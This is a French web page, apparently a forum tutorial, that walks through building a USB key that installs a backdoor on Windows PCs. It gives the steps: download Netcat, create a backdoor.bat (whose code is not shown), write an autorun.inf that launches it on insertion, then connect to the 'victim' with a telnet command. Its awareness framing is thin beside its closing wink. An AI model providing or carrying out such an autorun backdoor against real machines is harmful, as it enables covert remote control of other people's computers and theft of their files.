Cette page est réservée aux membres d'un groupe dont vous ne faites pas partie.
Pour plus d'informations veuillez contacter l'administrateur du site.
Veuillez vous connecter ou créer un compte pour accéder à cette page.
Accès refusé
Ce mot de passe est géré par l'administrateur du site. Veuillez contacter l'administrateur si vous désirez accéder à ce contenu.
Accès refusé
Ce rootkit s’exécute automatiquement, crée un backdoor sur un PC Windows et vous permet d’accéder a l’ordinateur de la victime à distance depuis n’importe quelle machine.
Comme d’habitude l’objectif ce tutoriel, c’est de montrer aux dirigeants d’entreprises à quel point l’utilisation des clés USB peut être dangereux. Ce qui est valable pour les entreprises ne l’est pas moins pour les simples particuliers. 🙂
Pour créer notre clé USB backdoor, il faut suivre les étapes ci-dessus:
Étape 1
Premièrement, nous allons créer un dossier sur notre clé USB ensuite nous allons télécharger Netcat, un utilitaire permettant d’ouvrir des connexions réseau, que ce soit UDP ou TCP. Vous pouvez aussi utiliser cryptcat, le clone de netcat, à la seule condition que ce dernier chiffre ses communications.
Télécharger Netcat pour windows
Apres le téléchargement de Netcat, on le dézippe dans le dossier crée.
Etape 2
Ensuite nous allons créer un fichier backdoor.bat. Ce dernier va faire deux trucs:
Pour cela, créez un nouveau document texte avec bloc note ou autres et écrire le code ci-dessous:
Etape 3
Maintenant il vous reste de créer le fichier autorun.inf
Dans cette étape nous allons créer une nouvelle option dans la fenêtre qui apparaît à l’insertion d’une USB, qui nous permettra (une fois cliquez dessus) notre backdoor s’installe sur l’ordinateur cible.
Pour réalisez ceci, ouvrez un nouveau document texte puis on insère ce code :
[autorun]
open=backdoor.bat
ACTION= »donner un nom à cette action »
Enfin on enregistre le fichier sous la racine de la clé sous le nom autorun.inf
Après l’insertion du clé USB, vous pouvez à partir de n’importe quelle machine vous connecter sur le poste de la victime avec la commande suivante:
telnet 192.168.1.17 8800
192.168.1.17 désigne l’adresse IP de la machine distant qui vous faut remplacer. Et 8800 c’est le port utiliser pr se connecter.
Et voilà ! Vou pouvez faire ce qui vous chante : ouvrir des fichiers, lancer une recherche, exécuter un programme…
Pour vous déconnecter, tapez « logout » .
Faites-en bon usage. 😀
Nombre d'invité : 0
Aucun évènement à venir


